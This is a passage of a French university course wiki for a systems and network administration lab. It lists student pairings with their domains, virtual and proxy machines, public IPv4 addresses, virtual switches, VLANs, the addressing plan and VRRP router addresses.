| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|Mohamed Salhi
|pont_msalhi
|192.168.10.0/24
}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 ||
|-
| Routeur C9200-E306 ||
|-
| Borne Wi-Fi E304 ||
|-
| Borne Wi-Fi E306 ||
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-01-20T14:27:09Z

Msalhi : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */

SE4 IdO sécurité système/réseau 2025/2026

2026-01-20T13:20:48Z

Msalhi : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */